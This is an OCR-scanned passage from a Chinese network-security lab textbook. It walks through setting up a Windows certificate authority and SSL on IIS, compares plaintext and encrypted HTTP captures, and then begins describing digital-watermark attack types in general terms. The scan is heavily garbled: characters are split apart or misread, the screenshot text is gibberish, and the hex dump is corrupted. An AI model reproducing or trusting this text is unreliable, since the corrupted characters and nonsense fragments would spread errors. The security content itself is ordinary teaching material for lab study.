认证 .安全 时 间 戳 .安全 公证 服务 和 不 可 否认 服务 。 作 为 一 种 基础 设施 ,PKI 的 应 用 范围 非 
常 广泛 ,证书 应 用 也 在 不 断 发 展 之 中 。 下 面 着 重 介绍 本 实验 相关 的 Web 安全 。 

浏览 Web 页 面 是 人 们 最 常用 的 访问 Internet 的 方式 。 如 果 要 通过 Web 进行 一 些 商业 
交易 ,该 如 何 保证 交易 的 安全 呢 ? 一 般 来 讲 , Web 上 的 交易 可 能 带 来 的 安全 问题 有 以 下 
Iss 

(1) 诈 骗 。 建 立 网 站 是 一 件 很 容易 的 事 ,因此 伪装 一 个 商业 机 构 非 常 简单 ,然后 诈骗 者 
可 以 让 访问 者 填写 一 份 注册 资料 ,从 而 获取 访问 者 的 隐私 。 调 查 显示 ,邮件 地 址 和 信用 卡号 
的 泄露 大 多 是 通过 网 络 诈骗 所 获取 的 。 
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(2) 泄露 。 当 交易 的 信息 在 网 上 被 非 匿 名 显示 传播 时 ,窃听 者 可 以 很 容易 地 窃取 并 提 
取 其 中 的 敏感 信息 。 

(3) 自 改 。 信 息 窃取 者 还 可 以 蔡 换 所 窃取 信息 中 的 部 分 内 容 , 如 姓名 ,信用 卡号 甚至 交 
易 金 额 ,以 达到 自己 的 目的 。 

(4) 攻击 。 主 要 是 对 Web 服务 器 的 攻击 ,如 本 书 第 7 章 中 提 到 的 DDOS 攻击 ,攻击 的 
发 起 者 可 以 是 网 络 上 恶意 的 个 人 ,也 可 以 是 同行 的 竞争 者 。 

针对 以 上 各 种 网 络 丙 端 ,PKI 技术 可 以 保证 Web 访问 和 交易 多 方面 的 安全 需求 ,使 网 
页 浏览 和 使 用 的 安全 性 得 到 保障 。 

为 了 透明 地 解决 Web 的 安全 问题 ,在 两 个 实体 进行 通信 之 前 , 先 要 建立 SSL 连接 ,以 
此 实现 对 应 用 层 透明 的 安全 通信 。SSL 是 一 个 介 于 应 用 层 和 传输 层 之 间 的 可 选 层 , 它 在 
TCP 之 上 建立 了 一 个 安全 通道 ,提供 基于 证 书 的 认证 、 信 息 完整 性 和 数据 保密 性 。SSL 协 
议 已 在 Internet 上 得 到 广泛 的 应 用 。 


5.4 实验 内 容 

在 服务 器 和 客户 端 都 不 要 身份 认证 的 过 程 中 ,通过 协议 分 析 器 分 析 通信 过 程 是 以 明文 
实现 的 ;在 服务 器 得 到 身份 验证 与 客户 端 进 行 通信 的 过 程 中 ,通过 协议 分 析 器 分 析 得 到 它们 
之 间 的 通信 是 以 密 文 实现 的 。 


5.5 实验 步骤 


本 练习 主机 A、B、C 为 一 组 。 实 验 角 色 说 明 如 表 5-1 所 示 。 
表 5-1 实验 角色 说 明 


实验 主机 实验 角色 
主机 A CA 

主机 B 服务 器 
主机 C 客户 端 


5.5.1 无 认证 


通常 在 Web 服务 器 端 没有 做 任何 加 密 设置 的 情况 下 ,其 与 客户 端的 通信 是 以 明文 方式 
进行 的 。 

客户 端 启动 协议 分 析 器 ,选择 “文件 ”>“ 新 建 捕获 窗口 ”菜单 命令 ,然后 单 击 工 具 栏 中 的 
“开始 ”按钮 开始 捕获 。 

客户 端 在 TE 浏览 器 地 址 栏 中 输入 http:// 服 务 器 IP, 访 问 服务 器 Web IRF. 

成 功 访问 到 服务 器 Web 主页 面 后 , 单 击 协议 分 析 器 捕获 窗口 工具 栏 中 的 “刷新 ”按钮 ， 
在 “会 话 分 析 ” 视 图 中 依次 展开 “会 话 分 类 树 ”>“HTTP 会 话 ”>“ 本 机 IP 与 同 组 主机 IP 地 
址 间 的 会 话 ”, 在 端口 会 话 中 选择 源 或 目的 端口 为 80 的 会 话 , 在 右 侧 会 话 视 图 中 选择 名 为 
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GET 的 单 次 会 话 , 并 切换 至 “协议 解析 ”视图 。 
通过 协议 分 析 器 对 HTTP 会 话 的 解析 中 可 以 确定 ,在 无 认证 模式 下 ,服务 器 与 客户 端 
的 Web 通信 过 程 是 以 明文 实现 的 。 协 议 分 析 器 捕获 到 的 明文 如 图 5. 1 所 示 。 


: 28 51 32 00 SA 30 00 OC 29 OE 90 30 08 00 i5 00  (Q2.20..)..0..t. 
: 01 DO Si D1 40 OO 80 O6 4D DD AC 10 00 sc AC 10 .DQNB...Nf4.. V4. 
= 00 FD ob 1 16 .9 


图 5.1 协议 分 析 器 捕获 到 的 明文 


5.5.2 单 向 认证 


1. CA( 主 机 A) 安 装 证 书 服务 

主机 A 依次 选择 “开始 ”设置 ”控制 面板 ”添加 或 删除 程序 ”添加 /删除 
Windows 组 件 ”, 选 中 组 件 中 的 “证 书 服务 ”, 此 时 出 现 *Microsoft 证 书 服务 "提示 信息 ,选中 
“是 " 单 选 按钮 ,然后 单 击 * 下 一 步 " 按 钮 。 

在 接 下 来 的 安装 过 程 中 依次 确定 以 下 信息 : 

(1) “CA 类 型 "(选择 独立 根 CA) 对 话 框 如 图 5. 2 所 示 。 


A 类 型 
选择 您 想 设置 的 CA 类 型 。 e 


€ 企业 根 CAB) 

€ 企业 从 属 CAR) 
6 
C 独立 从 属 CAD 


ca een 
^ URBIS RAIA USD CA 


DECRE CAs 需要 Active Directory， 您 必须 同时 是 企业 管理 员 组 的 成 


厂 用 自 定义 设置 生成 密 钥 对 和 CA 证 书 D 


《< 上 一 步 @@) 取消 Es] 
图 5.2 选中 “独立 根 CA? 单 选 按钮 


(2) CA 的 公用 名 称 (userGXCA ,其 中 G 为 组 编号 (1 一 32),X 为 主机 编号 (A 一 F) ,如 
第 2 组 主机 D, 其 使 用 的 用 户 名 应 为 user2D) 。 
(3)“ 证 书 数据 库 设置 "对话 框 如 图 5. 3 所 示 ,保持 默认 。 
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Windows HPA S I 
证 书 数据 库 设置 =" 
输入 证 书 数据 库 、 数 据 库 日 志和 配置 信息 的 位 置 。 ie 
证 书 数据 库 C)- 
iis ilko | 
证 书 数 据 库 日 志 四 ): 
:wmmovsvsrstmazvcerte SCS 
V 将 配置 信息 存储 在 共享 文件 赤 中 (S) 
共享 文件 天 OO: 
:VCAEonfig EQ... 


F Ren ARES (E) 


xa | wm | 
图 5. 3 “证 书 数据 库 设置 "对 话 框 


在 确定 上 述 信息 后 ,系统 会 提示 是 否 要 暂停 Internet 信息 服务 , 单 击 “ 是 ”按钮 ,系统 开 
始 进 行 组 件 安装 。 安 装 过 程 中 ,在 弹出 的 所 需 文件 ”对 话 框 中 指定 “文件 复制 来 源 ” 为 C:\ 
ExpNIS\Encrypt-Lab\ Tools\ WindowsCA\i386 即 可 (车 安装 过 程 中 出 现 提示 信息 ,请 忽略 
该 提示 继续 安装 )。 文件 复制 来 源 设置 如 图 5.4 所 示 。 


x 
=, FRE Service Pack 1 CI-RON 上 的 文件 
区 


取消 


输入 文件 所 在 的 路 径 ， 然 后 单 击 “确定 ”。 


文件 复制 来 源氏 ): 


\ExpNIS\Encrypt-Lab\Tools\WindowsCA\isee v] — ENEQD... 


图 5.4 文件 复制 来 源 设置 


ib. 若 安装 过 程 中 出 现 *Windows 文件 保护 ”提示 , 单 击 “ 取 消 ” 按 钮 ,选择 “是 ”继续 ;在 
证 书 服务 安装 过 程 中 若 网 络 中 存在 主机 重 名 , 则 安装 过 程 提示 错误 ;安装 证 书 服务 之 后 , 计 
算 机 将 不 能 再 重新 命名 ,不 能 加 入 到 某 个 域 或 从 某 个 域 中 删除 ;要 使 用 证 书 服务 的 Web 组 
件 , 需 要 先 安装 IIS( 本 系统 中 已 安装 IIS) 。 

在 启动 “证 书 颁发 机 构 ” 服 务 后 ,主机 A 便 拥 有 了 CA 的 角色 。 

2. 服务 器 (主机 B) 证 书 申请 

ik. 服务 器 向 CA 进行 证 书 申请 时 ,要 确保 在 当前 时 间 CA 已 经 成 功 拥 有 了 自身 的 
角色 。 

(1) 提交 服务 器 证 书 申请 。 

服务 器 在 “开始 ”>“ 程 序 ”>“ 管 理工 具 ” 中 打开 “Internet 信息 服务 (1IS) 管 理 器 ”, 通 过 
“Internet 信息 服务 (IIS) 管 理 器 ? 左 侧 树 状 结构 中 的 “Internet 信息 服务 ”>“ 计 算 机 名 (本 地 
计算 机 )”>“ 网 站 ”一 “默认 网 站 ”打开 默认 网 站 ,然后 右 击 “ 默 认 网 站 ”, 在 弹出 的 快捷 菜单 中 
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单 击 ” 


属性 ”命令 。 配 置 “Internet 信息 服务 (IIS) 管 理 器 ”窗口 如 图 5. 5 所 示 。 


2/0) xl 


Mg 文件 E) REA EEV BOW HHH 


ETE! 


e »|&mlm|x:mg|g|2|»mnu 


Internet 信息 服务 


B Host4p( 本 地 计算 机 ) D:\Work\bbs 
J FIP 站 点 D:l1Work|DVBBSlBBS 
: id id C:\Program Files\usr\eg\Perlex 
c 9 ENG pie Hoist 
| @CertControl C:AWINDOWS\system32\CertSrv\Ce... 
由 KBA (ik) ai CertEnroll C:\WINDOWS\system32\CertSrv\Ce... 
BL) 单 点 登录 (5505ke| — Sonet tent 
森马 网 站 2 (停止 ) | maoe 
四 条 正常 网 站 (停止 ) | — index fies 
D 单 点 登录 (App1) 
BS 单 点 登录 (App2) |E 
54 钓 色 网 站 (停止 ) | 
I Web 服务 扩展 
4 + 
图 5.5 “Internet 信息 服务 (IIS) 管 理 器 ”窗口 


在 “默认 网 站 属性 ”对 话 框 的 “目录 安全 性 ”选项 卡 中 单 击 “ 安 全 通信 ”区 域 的 “服务 器 证 
书 ? 按 钮 ,此 时 出 现 ”"Web 服务 器 证 书 向 导 ” 对 话 框 , 单 击 " 下 一 步 ” 按 钮 , 如 图 5.6 所 示 。 


x 
网 站 — | 性 能 — | IshrI mies | BR | xë | 
目录 安 人 性 | omi | BENRA | aea 
『 身 份 验证 和 访问 控制 

E GREAT 
ty E mL 
[IP 地 址 和 域名 限制 
8 PET NE Internet mateo 
REW... 
ED 
= PERAN, ERRSNEFBAE | Le 
查看 证 书 V 
EO). 


图 5.6 Web 服务 器 证 书 的 配置 


在 “选择 此 网 站 使 用 的 方法 "中 ,选择 “新 建 证 书 ”, 单 击 “ 下 一 步 ? 按 钮 。 

选择 “现在 准备 证 书 请 求 , 但 稍 后 发 送 ”, 单 击 “ 下 一 步 "按钮 。 

填 人 有 关 证 书 申请 的 相关 信息 , 单 击 “ 下 一 步 ?按钮 。 

在 “证 书 请 求 文件 名 ”对 话 框 中 ,指定 证 书 请 求 文件 的 文件 名 和 存储 的 位 置 (默认 为 C:\ 
certreq. txt)。 单 击 “ 下 一 步 ” 按 钮 直到 出 现 “ 完 成 ”按钮 并 单 击 该 按钮 。 证 书 请 求 的 文件 名 
如 图 5.7 所 示 。 
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证 书 请 求 文件 名 
以 指定 的 文件 名 格 证 书 请 求 保存 为 文本 文件 。 


输入 证 书 请 求 的 文件 名 。 
RASH: 


Em — O 


ow | 


图 5.7 证 书 请 求 的 文件 名 


(2) 通过 Web 服务 器 向 CA 申请 证 书 。 
服务 器 在 IE 浏览 器 地 址 栏 中 输入 "http://CA 的 IP/certsrv/” 并 确认 ,如 图 5. 8 所 示 o 


ali xj 
E 


Onn [us "| 
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主页 


eh Web 浏览 器 ， 电 子 邮 件 客户 请 式 其 他 径 序 申请 一 个 证书。 站 这 使 用 证 书 ， 您 可 以 问 通 过 Reb 通信 的 人 确认 姑 的 身价 ， 签 晋 并 加 密 闻 件 ， 并 且 ， 根 据 你 申请 的 古书 的 类 刘 ， 执 行 其 他 
安全 任务 ， 


业 也 可 以 使 用 此 网 站 下 载 证 书 和 发 机 构 (有 证书， 证 书 钴 ， 或 证 节 吊 销 列表 (ORL), DESERT RGAS HEREDI. 


Id 


ane T-T-T-T-T i vn 


图 5.8 通过 Web 服务 器 向 CA 申请 证 书 


服务 器 依次 单 击 “ 申 请 一 个 证 书 ” 一 “高 级 证 书 申请 ”一 “使 用 base64 编码 提交 一 个 申 
di" ,进入 "提交 一 个 证 书 申请 或 续 订 申请 ?页面 。 

打开 证 书 请 求 文件 certreq. txt, 将 其 内 容 全 部 复制 并 粘贴 到 提交 证 书 申请 页 面 的 “保存 
的 申请 ”文本 框 中 ,然后 单 击 “ 提 交 ” 按 钮 ,并 通告 CA 已 提交 证 书 申请 ,等 待 CA 颁发 证 书 。 
证 书 挂 起 状态 如 图 5.9 所 示 。 

(3) CA 为 服务 器 颁发 证 书 。 

在 服务 器 提交 了 证 书 申请 后 ,CA 在 “管理 工具 ”一 “证 书 颁发 机 构 ” 中 单 击 左 侧 树 状 结 
构 中 的 “ 挂 起 的 申请 ”选项 ,会 看 到 服务 器 提交 的 证 书 申请 。 右 击 服务 器 提交 的 证 书 申请 ,在 
弹出 的 快捷 菜单 中 选择 “所 有 任务 ”>“ 颁 发 "命令 ,为 服务 器 颁发 证 书 ( 这 时 “ 挂 起 的 申请 ”日 
录 中 的 申请 立刻 转移 到 “颁发 的 证 书 ” 目 录 中 ,双击 查看 为 服务 器 颁发 的 证 书 )。 颁 发 过 程 如 
图 5.10 所 示 。 

通告 服务 器 查看 证 书 。 
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ft 证 书 服务 - Microsoft Internet Explorer 


XED #80 FEV BEW TAD HID 
om- O- NAOR okak Ole aM- 


地 址 (D) fa http://172.16.0.69/certsrvjcertfnsh.asp 


Hicrosoft 证 书 服务 一 user4DCA 

证 书 挂 起 

您 的 证 书 申请 已 经 收 到 。 但 是 ， 您 必须 等 符 管理 员 颁 发 您 申请 的 证 书 。 
您 的 申请 Id 为 2。 
请 在 一 天 或 两 天 内 返回 此 网 站 以 检索 您 的 证 书 。 

注意 : 您 必须 用 此 Web 浏览 器 在 10 天 内 返回 以 检索 您 的 证 书 


fen 证 书 颁 发 机 构 
文件 (E) MEAD SEW MH 
e» om AR e 


C3 失败 的 申请 


图 5.10 CA 颁发 证 书 


3. 服务 器 (主机 B) 安 装 证 书 

(1) 服务 器 下 载 、 安 装 由 CA 颁发 的 证 书 。 

通过 CA“ 证书 服务 主页 ”>“ 查 看 挂 起 的 证 书 申 请 的 状态 ”一 “保存 的 申请 证 书 ”, 进 入 
“证 书 已 颁发 "窗口 ,分 别 单 击 " 下 载 证 书 ” 和 “下 载 证 书 链 ” 链 接 , 将 证 书 和 证 书 链 文 件 下 载 到 
本 地 ,如 图 5.11 所 示 。 

在 “默认 网 站 属性 ”对 话 框 的 “目录 安全 性 ”选项 卡 中 单 击 “ 服 务 器 证 书 ” 按 钮 ,此 时 出 现 
“Web 服务 器 证 书 向 导 ” 对 话 框 , 单 击 “ 下 一 步 ” 按 钮 。 

选择 “处 理 挂 起 的 请 求 并 安装 证 书 ”, 单 击 “ 下 一 步 ” 按 钮 。 

在 “路 径 和 文件 名 ”中 选择 存储 到 本 地 计算 机 的 证 书 文件 , 单 击 * 下 一 步 ” 按 钮 。 

在 “SSL 端口 "文本 框 中 填 人 “443”, 单 击 “ 下 一 步 ” 按 钮 直到 出 现 “ 完 成 ”按钮 并 单 击 该 
按钮 。“ 证 书 摘要 ”对 话 框 如 图 5. 12 所 示 。 

此 时 服务 器 证 书 已 安装 完毕 ,可 以 在 “目录 安全 性 ”选项 卡 中 单 击 “ 查 看 证 书 ” 按 钮 ,查看 
证 书 的 内 容 。 未 安装 成 功 的 证 书 会 有 图 5. 13 所 示 的 提示 信息 内 容 。 
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Microsoft 证 书 服 务 - Microsoft Internet Explorer 
RHO MRO SEW KEW IAW hw 
OQR- O- D2 ALR “wee e|C- o MIE- 


[££] http://172.16.0.69/certsrvjcertfnsh.asp 


Hicrosoft 证 书 服务 ~ 
证 书 已 颁发 
您 申请 的 证 书 已 颁发 给 您 

CDER 编码 或 CBase 64 编码 


H 
ime 77777 FTT T T Miet 
图 5.11 服务 器 下 载 证 书 


证 书 摘要 
已 选择 从 响应 文件 安装 证 书 。 


单 击 “ 下 一 步 ”按钮 安装 下 列 证 书 。 
文件 名 ; C:\Documents and Settings\Admini strator MEE cer tnew. cer 


证 书 详细 信息 : 

host4e 
user4DCA 
2015-10-24 
服务 器 验证 


à 


USTE 
xinan1201 


m | 
图 5. 12 “证 书 摘要 ”对 话 框 


Gg msaa 


FEVER EAT Ra EOE BREA. 


颁发 给 : hostib 
RB: userid 


有 效 起 始 日 期 2014-10-23 到 2015-10-28 
P 您 有 一 个 与 该 证 书 对 应 的 私 铀 。 


MESH S) 


图 5.13 未 安装 成 功 的 证 书信 息 


PK 证书 应 用 
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(2) 服务 器 下 载 .安装 CA 根 证 书 。 
右 击 certnew. p7b 证 书 文件 ,在 弹出 的 快捷 菜单 中 选择 “安装 证 书 ” 命 令 , 进 入 “证 书 导 
和 向导? 对 话 框 , 单 击 “下 一 步 ?按钮 ,在 “证 书 存储 ?对 话 框 中 选中 * 将 所 有 的 证 书 放 入 下 列 存 
储 ” 单 选 按钮 ,浏览 选择 “受信 任 的 根 证 书 颁发 机 构 ”->“ 本 地 计算 机 ”, 如 图 5. 14 所 示 。 
axi 


证 书 存储 
证 书 存储 是 保存 证 书 的 系统 区 域 。 


Windows 可 以 自动 选择 证 书 存储 ,或 者 您 可 以 为 证 书 指定 一 个 位 置 。 
个 根据 证 书 类 型 ， 自 动 选择 证 书 存储 QD 
© 将 所 有 的 证 书 放 入 下 列 存储 ©) 
证 书 存储 : 


Perse G 


<£-# ®) | F-# WO >| 取消 | 


图 5.14 证 书 导入 


单 击 “ 下 一 步 ” 按 钮 ,直到 完成 。 青 次 查看 服务 器 证 书 。 此 时 安装 成 功 的 证 书信 息 如 
图 5.15 所 示 。 
[r5 MEE 
Ca | 详细 信息 | 证 书 路 径 | 


证 书信 息 


这 个 证 书 的 目的 如 下 : 
* 保证 远程 计算 机 的 身份 


颁发 给 :  hostib 
HRB: 。 userlA 


有 效 起 始 日 期 2014-10-29 到 2015-10-29 
P 您 有 一 个 与 该 证 书 对 应 的 私 钥 。 


颂 发 者 说 明 (8) | 


图 5.15 安装 成 功 的 证 书信 息 


4. Web 通信 

服务 器 在 “默认 网 站 属性 ”对 话 框 的 “目录 安全 性 ”选项 卡 “ 安 全 通信 ”区 域 单 击 “ 编 辑 ” 
按钮 ,在 弹出 的 对 话 框 中 选中 “要 求 安全 通道 (SSL)” 复 选 框 ,并 且 选 中 “忽略 客户 端 证 书 ” 
(不 需要 客户 端 身份 认证 ) 单 选 按 钮 , 单 击 “ 确 定 ” 按 钮 使 设置 生效 ,如 图 5. 16 所 示 。 

客户 端 重启 TE 浏览 器 ,在 地 址 栏 中 输入 “http:// 服 务 器 IP/” 并 确认 ,此 时 访问 的 Web 
页 面 如 图 5. 17 所 示 。 
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x 
WW 要 求 安全 通道 GSL) Q) 
T 要 求 128 位 加 密 (1) 
三 客 户 端 证 书 
c ARERO; 
C RRSPREBW 

C 要 求 客户 端 证 书 W 

T 启用 客户 端 证 书 映射 U) 


VERREM oto. om 
USE dem 


厂 BRIERE EAR QD 


当前 cz: | z] 
35i Ww ie | 


取消 EDW 


图 5. 16 “安全 通信 ?对 话 框 设置 


BE ET - Microsoft Internet Explorer 
文件 (E) RHO FEV KRA TAD BW | @ 
Om- O- A GO| Dar wx O|O- 3 


HAED) [8] beep 1/172. 16.0.84/ -| Era um» 
E 


[i] 无 法 显示 网 页 


您 正在 查找 的 页 当前 不 可 用 。 网 站 可 能 多 到 | 支持 问题 ,或 者 您 需要 调整 
您 的 浏览 器 设置 。 


请 尝试 以 下 操作 


e 单 击 有 刷新 按钮 ,或 稍 后 重 试 。 
如 果 您 已 经 在 地 址 栏 中 输入 该 网 页 的 地 址 ， 请 确认 其 拼写 正确 。 
e 要 检查 您 的 网 络 连 接 ， 请 单 击 工具 菜单 GBH Internet 
选项 在 连接 选项 不 上 ， 单 击 设置 。 设置 必须 与 您 的 局 域 网 
(LAN) 管理 员 或 Internet 服务 供应 商 OSP) 提供 的 一 致 。 
查看 您 的 Internet 连接 设置 是 否 正确 被 检测 。 您 可 能 设置 让 
Microsoft Windows 检查 您 的 网 站 并 自动 发 现 网络 连 接 设置 COR 
您 的 网 络 管理 员 已 经 启用 此 设置 )。 

1， 单 击 工具 菜单 ， 然 后 单 击 Tnternet 选项 。 

2. 在 连接 选项 卡 上 ， SLAW RE. 

3. 选择 自动 检测 设置 ， 然 后 单 击 确定 。 
某 些 站 点 要 求 128- 位 的 连接 安全 性 。 单 击 和 帮助 菜单 ， 热 后 单 击 
关于 Internet Explorer 可 以 查看 您 所 安装 的 安全 强度 。 
如 果 悠 要 访问 某 安全 站 点 ,请 确保 悠 的 安全 设置 能 够 支持 。 请 单 
击 工具 菜 单 ， 然 后 单 击 Internet 选项 。 在 “高 级 ” 选项 卡 
上 ,滚动 到 “安全 ”部 分 Sik SSL 2.0、SSL 3.0. TLS 1.0. 
PCT 1.0 设置 。 


单 击 外 上 一 步 按钮 ,尝试 其 地 涟 接 。 


找 不 到 服务 器 或 OWS 错误 


Internet Explorer 


js PTT TT fep internet 
图 5.17 客户 端 访问 服务 器 
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客户 端 启 动 协议 分 析 器 ,设置 过 滤 条 件 : 仅 捕 获 客 户 端 与 服务 器 间 的 会 话 通信 ,并 开始 
捕获 数据 。 

客户 端 在 IE 浏览 器 地 址 栏 中 输入 “https:// 服 务 器 IP/” 并 确认 ,访问 服务 器 Web 服 

务 。 此 时 会 出 现 “ 安 全 警报 ”对 话 框 , 提 示 “ 即 将 通过 安全 连接 查看 网 页 ”, 单 击 “ 确 定 ” 按 钮 ， 
如 图 5. 18 所 示 。 

EINEN 9 

gp termin 
KR A TENA WUCHAESIMS GIO RIS 


T 以 后 不 再 显示 该 警 肖 CI) 


genau] 


图 5. 18 “安全 警报 ”对 话 框 


出 现 * 安 全 警报 ?对 话 框 询问 "是 否 继续 ?”, 单 击 * 是 按钮。 此 时 客户 端 即 可 访问 服务 器 
Web 页 面 。 访 问 成 功 后 ,停止 协议 分 析 器 捕获 ,并 在 会 话 分 类 树 中 找到 含有 客户 端 与 服务 


器 IP 地 址 的 会 话 。 
在 协议 解析 页 面 可 观察 到 ,服务 器 与 客户 端的 Web 通信 过 程 是 以 密 文 实现 的 。 协 议 分 


析 器 捕获 到 的 密 文 如 图 5. 19 所 示 。 


图 5. 19 协议 分 析 器 捕获 到 的 密 文 


5.6 思考 问题 


. PKI 的 基本 原理 是 什么 ? 

. PKI 的 功能 模块 组 成 有 哪些 ? 

. 对 称 密 钥 算法 是 否 可 以 用 来 进行 数字 签名 ? 

. 如 果 用 户 将 根 证 书 删除 ,用 户 证 书 是 否 还 会 被 信任 ? 


S co Ne 
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ent 主动 水 印 攻击 
6.1 实验 目的 与 要 求 


了 解数 字 水 印 攻击 原理 。 

掌握 常用 的 数字 水 印 攻击 手段 。 

练习 使 用 不 同 的 数字 水 印 攻击 方法 。 

学 习 针 对 不 同 的 攻击 算法 选择 合适 的 攻击 方式 。 


6.2 实验 环境 


在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003 ,在 交换 网 络 结构 下 ,每 组 3 人 ,使 
用 LSB,Puff,StirMark,UltraEdit-32 工具 。 


6.3 背景 知识 


6.3.1 数字 水 印 基础 


数字 水 印 就 是 永久 镶嵌 在 其 他 数据 (宿主 数据 ) 中 具有 可 鉴别 性 的 数字 信号 或 模式 ,而 
且 不 影响 宿主 数据 的 可 用 性 。 数 字 水 印 是 信息 隐藏 技术 最 重要 的 一 个 分 支 , 它 可 为 计算 机 
网 络 上 的 多 媒体 数据 或 产品 的 版 权 保护 等 问题 提供 一 个 潜在 的 有 效 解决 方法 。 

在 大 多 数 情况 下 ,添加 的 水 印信 息 是 不 可 察觉 的 或 者 是 不 可 见 的 ,但 是 在 某 些 使 用 可 见 
数字 水 印 的 特定 场合 ,版 权 保护 标志 不 要 求 隐藏 ,并 且 希 望 攻 击 者 在 不 破坏 数据 本 身 质量 的 
情况 下 无 法 将 水 印 去 掉 。 

发 展 数字 水 印 技术 的 原动力 是 为 了 提供 多 媒体 数据 的 版 权 保护 ,但 人 们 发 现 数 字 水 印 
还 具有 其 他 的 一 些 重要 应 用 ,如 数字 文件 真 伪 鉴 别 、 网 络 的 秘密 通信 和 隐 含 标注 等 ,不 同 的 
应 用 对 数字 水 印 技术 的 要 求 也 是 不 尽 相 同 的 。 


6.3.2 数字 水 印 攻击 手段 


按照 数字 水 印 的 攻击 原理 ,可 将 水 印 分 为 下 面 几 种 攻击 类 型 。 

l. 简单 攻击 

简单 攻击 又 称 为 波形 攻击 、 噪 声 攻击 。 它 试图 对 整个 水 印 化 数据 进行 操作 来 削弱 嵌入 
的 水 印 幅 度 ,导致 数字 水 印 提取 发 生 错 误 , 甚 至 根本 提取 不 出 水 印信 号 。 常 见 的 操作 有 线性 
滤波 .通用 非 线性 滤波 、 压 缩 . 加 噪声 、 漂 移 、 像 素 域 量化 、 数 模 转换 及 y 修正 等 。 

简单 攻击 中 的 操作 会 给 水 印 化 数据 造成 类 噪声 失真 .在 水 印 提取 和 校 验 过 程 中 将 得 到 
一 个 失真 变形 的 水 印信 号 。 可 以 采用 两 种 方法 抵抗 这 种 类 噪声 失真 , 即 增加 庶 入 水 印 的 幅 
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度 和 宛 余 嵌入 。 

2. 同步 攻击 

同步 攻击 又 称 为 禁止 提取 攻击 (detection-disabling attacks) 。 这 种 攻击 试图 破坏 载体 
数据 和 水 印 的 同步 性 。 被 攻击 的 数字 作品 中 水 印 仍然 存在 ,而 且 幅 度 没 有 变化 ,但 是 水 印信 
号 已 经 错位 不 能 维持 正常 水 印 提 取 过 程 所 需要 的 同步 性 。 这 样 水 印 提取 器 就 不 可 能 、 或 者 
无 法 实行 对 水 印 的 恢复 和 提取 。 同 步 攻击 通常 采用 几何 变换 方法 ,如 缩放 、 空 间 方向 的 平 
BS .时 间 方 向 的 平移 .旋转 、 剪 切 、 剪 块 、 像 素 置 换 、 二 次 抽样 化 像素 或 者 像素 篮 的 减少 或 者 增 
加 等 。 

同步 攻击 比 简单 攻击 更 加 难以 防御 。 因 为 同步 攻击 破坏 水 印 化 数据 中 的 同步 性 ,使 得 
水 印 租 入 和 水 印 提取 这 两 个 过 程 不 对 称 。 而 对 于 大 多 数 水 印 技术 ,水 印 提取 器 都 需要 事先 
知道 租 入 水 印 的 确切 位 置 。 这 样 经 过 同步 攻击 后 水 印 将 很 难 被 提取 出 来 。 因 此 ,在 对 抗 同 
步 攻击 的 策略 中 应 该 设法 使 得 水 印 的 提取 过 程 变 得 简单 。 

3. HARE 

削 去 攻击 试图 通过 分 析 水 印 化 数据 ,将 水 印 化 数据 分 离 成 为 载体 数据 和 水 印信 号 ,然后 
抛弃 水 印 ,得 到 没有 水 印 的 载体 数据 ,达到 非法 盗用 的 目的 。 常 见 的 方法 有 联合 攻击 .去 噪 、 
确定 的 非 线 性 滤波 .采用 图 像 综 合 模型 的 压缩 。 针 对 特定 的 加 密 算 法 在 理论 上 的 缺陷 ,也 可 
以 构造 出 对 应 的 削 去 攻击 。 联 合 攻击 通常 采用 一 个 数字 作品 的 多 个 不 同 的 水 印 化 复制 实 
现 。 数 字 作品 的 一 个 水 印 化 复制 成 为 一 个 检测 体 。 

4. 混淆 攻击 

混淆 攻击 又 称 为 死 锁 攻击 、 倒 置 攻击 、 伪 水 印 攻 击 、 伪 源 数据 攻击 。 这 种 攻击 试图 生成 
一 个 伪 源 数据 伪 水 印 化 数据 来 混淆 含有 真正 水 印 的 数字 作品 的 版 权 。 一 个 例子 是 倒置 攻击 
虽然 载体 数据 是 真实 的 ,水 印信 号 也 存在 ,但 是 由 于 嵌入 了 一 个 或 者 多 个 伪造 的 水 印 混 淆 了 
第 一 个 含有 主权 信息 的 水 印 , 失 去 了 唯一 性 。 

在 混淆 攻击 中 同时 存在 伪 水 印 . 伪 源 数据 、 伪 水 印 化 数据 和 真实 水 印 .真实 源 数据 、 真 实 
水 印 化 数据 。 要 解决 数字 作品 正确 的 所 有 权 ,必须 在 一 个 数据 载体 的 几 个 水 印 中 判断 出 具 
有 真正 主权 的 水 印 。 一 种 对 策 是 采用 时 间 戳 (timestamps) 技 术 。 时 间 戳 由 可 信 的 第 三 方 提 
供 , 可 以 正确 判断 谁 第 一 个 为 载体 数据 加 了 水 印 。 这 样 就 可 以 判断 水 印 的 真实 性 。 

5. IBM 攻击 

IBM 攻击 是 针对 可 逆 、 非 盲 水 印 算法 而 进行 的 攻击 。 其 原理 为 : 设 原始 图 像 为 I, 加 入 
水 印 WA 的 图 像 为 IA 二 I 二 WA。 攻击 者 首先 生成 自己 的 水 印 WF ,然后 创建 一 个 伪造 的 原 
图 Ig — I4— WF. Bl 及 一 天 十 WF。 此 后 ,攻击 者 可 声称 他 拥有 IA 的 版 权 。 因 为 攻击 者 可 利 
用 其 伪造 原 图 Ir 从 原 图 工 中 检测 出 其 水 印 WF; 但 原作 者 也 能 利用 原 图 从 伪造 原 图 I 中 检 
测 出 其 水 印 WA。 这 就 产生 无 法 分 辨 与 解释 的 情况 。 防 止 这 一 攻击 的 有 效 办 法 就 是 研究 不 
可 逆水 印 戏 入 算法 ,如 哈 希 过 程 。 

6. StirMark 攻击 

StirMark 是 英国 剑桥 大 学 开发 的 水 印 攻击 软件 , 它 采 用 软件 方法 ,实现 对 水 印 载体 图 
像 进行 的 各 种 攻击 ,从 而 在 水 印 载体 图 像 中 引入 一 定 的 误差 ,可 以 以 水 印 检测 器 能 否 从 遭受 
攻击 的 水 印 载体 中 提取 出 水 印信 息 来 评定 水 印 算法 抗 攻击 的 能 力 。 如 StirMark 可 对 水 印 
载体 进行 重 采样 攻击 , 它 可 以 模拟 首先 把 图 像 用 高 质量 打印 机 输出 ,然后 再 利用 高 质量 扫描 
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仪 扫描 ,重新 得 到 其 图 像 这 一 过 程 中 引入 的 误差 。 另 外 ,StirMark 还 可 以 对 水 印 载体 图 像 
进行 几何 失真 攻击 , 它 可 以 以 几乎 注意 不 到 的 轻微 程度 对 图 像 进行 拉 伸 、 剪 切 .旋转 等 几何 
